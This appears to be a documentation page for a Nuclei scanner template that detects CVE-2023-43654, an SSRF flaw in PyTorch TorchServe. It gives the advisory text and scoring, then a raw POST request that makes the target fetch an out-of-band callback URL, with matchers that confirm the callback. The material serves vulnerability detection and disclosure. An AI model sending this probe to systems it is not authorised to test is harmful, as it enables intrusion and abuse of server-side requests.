PyTorch TorchServe SSRF
ID: CVE-2023-43654
Severity: critical
Author: DhiyaneshDk
Tags: cve,cve2023,pytorch,oast,ssrf
Description
Section titled “Description”TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue.
YAML Source
Section titled “YAML Source”id: CVE-2023-43654
info: name: PyTorch TorchServe SSRF author: DhiyaneshDk severity: critical description: | TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue. reference: - https://github.com/pytorch/serve/pull/2534 - https://github.com/pytorch/serve/releases/tag/v0.8.2 - https://github.com/OligoCyberSecurity/ShellTorchChecker classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43654 cwe-id: CWE-918 epss-score: 0.00173 epss-percentile: 0.55187 cpe: cpe:2.3:a:pytorch:torchserve:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: pytorch product: torchserve fofa-query: body="Requested method is not allowed, please refer to API document" tags: cve,cve2023,pytorch,oast,ssrf
http: - raw: - | POST /models?url=http%3a//{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: interactsh_request words: - "User-Agent: Java"
- type: word part: content_type words: - "application/json"# digest: 4a0a00473045022045ecf24e622fcf26d83b9359f77eacdaa0c7ecc4f40a448bdbd19bef53dbbf1c022100ab523f353f4b0b57e6fa342e69f572260fc0c9cab4f84b40d98a301f3f21bfea:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-43654.yaml"